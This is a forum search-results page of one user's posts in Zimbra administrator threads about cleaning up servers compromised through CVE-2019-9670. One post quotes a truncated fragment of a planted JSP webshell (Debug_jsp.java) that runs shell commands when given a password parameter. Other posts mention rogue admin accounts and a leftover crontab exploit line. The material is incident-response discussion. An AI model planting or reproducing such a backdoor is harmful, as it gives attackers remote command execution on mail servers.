Search found 14 matches

by elby
Fri May 31, 2019 8:25 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","...
by elby
Fri May 31, 2019 7:40 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

The problem appeared again. Do you have these folders? /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp with: /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java and /opt/zimb...
by elby
Thu May 30, 2019 11:48 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

I have my Zimbra 8.6 with the last patch that I downloaded from Zimbra's site, patch 14. My OS is Redhat 6.6. The server is patched, but what can I do to remove this script? Thanks for any help. Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions, CentOS 6.6 Patch Zimbra: wget https...
by elby
Thu May 30, 2019 7:45 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions, CentOS 6.6 Patch Zimbra: wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-patch-8.6.0_GA_1242.tgz tar xzf zcs-patch-8.6.0_GA_1242.tgz cd /tar xzf zcs-patch-8.6.0_GA_1242 Delete global admin accounts Change password # Zimbra AJAX...
by elby
Wed May 29, 2019 2:38 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

How do I extract the original files from the installation source to replace the infected files with them? Under Windows.


Zimbra 8.6.0_GA Network Editions

edit: https://www.altap.cz/salamander/feature ... r-windows/
by elby
Wed May 29, 2019 10:45 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

Ignat wrote: I have the same problem with the server. I found many global admin accounts in newly created users.

How to list/view global admin accounts?

How to create an Admin account
by elby
Wed May 29, 2019 8:32 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

I find this: ==== /opt/zimbra/libexec/600.zimbra:if [ -f /opt/zimbra/log/swatch.pid ]; then echo "Restarting zmswatch"; $SU "/opt/zimbra/bin/zmswatchctl reload"; fi /opt/zimbra/libexec/zmrcd: "start snmp" => "/opt/zimbra/bin/zmswatchctl start", /opt/zimbra/lib...
by elby
Tue May 28, 2019 10:56 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

I did not express myself correctly.
Everything from my crontab was removed - only one line left to start exploit.
by elby
Tue May 28, 2019 10:25 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

zimbraxtc wrote:
Drake wrote:Hello guys


Thanks!

Don't miss:
/opt/zimbra/log/zmswatch and zmswatch.sh

Are these Zimbra files or an exploit?

My crontab is empty. How can I regenerate it?
by elby
Tue May 28, 2019 9:57 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

I totally went wrong :( [zimbra@mail ~]$ zmcontrol -v Release 8.6.0_GA_1153.RHEL6_64_20141215151258 RHEL6_64 NETWORK edition. I did the following (as root); cd /opt/zimbra/mailboxd find webapps -type d -exec chmod 0755 {} \; find webapps -type f -exec chmod 0644 {} \; Then restart Zimbra; su - zimbr...
